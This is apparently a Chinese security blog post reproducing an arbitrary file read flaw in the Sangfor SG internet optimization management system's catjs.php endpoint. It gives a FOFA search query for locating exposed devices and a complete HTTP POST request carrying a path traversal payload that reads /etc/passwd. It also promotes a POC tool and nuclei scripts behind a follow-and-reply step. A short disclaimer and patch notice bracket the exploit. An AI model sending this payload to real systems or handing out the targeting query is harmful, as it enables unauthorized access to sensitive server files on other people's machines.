深信服SG上网优化管理系统存在任意文件读取漏洞 附POC

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 深信服SG上网优化管理系统简介

微信公众号搜索：南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

SANGFOR上网优化管理系统是一款集上网行为管理、网络准入、设备准入以及业务访问行为分析于一体的安全产品。核心优势：多种认证方式、全面的审计能力、支持多种应用的封堵、*的流量控制；准确识别iot设备、统一管理硬件资产；强管控违规用户，精细分析行为画像；部署实施简单，维护成本低。全网行为管理基于端点无感知、少故障节点、不影响原有网络为原则的产品设计理念，致力于给客户带来更好的使用体验。

2.漏洞描述

深信服SG上网优化管理系统 catjs.php接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

深信服SG上网优化管理系统

4.fofa查询语句

title="SANGFOR上网优化管理"

5.漏洞复现

漏洞链接：https://127.0.0.1/php/catjs.php

漏洞数据包：

POST /php/catjs.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

["../../../../../../../etc/passwd"]

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现54 即可获得该POC工具下载地址：

本期漏洞及往期漏洞的nuclei脚本已经上传知识星球：南风网络安全

7.整改意见

厂商已发布了漏洞修复程序，请及时关注更新：https://www.sangfor.com.cn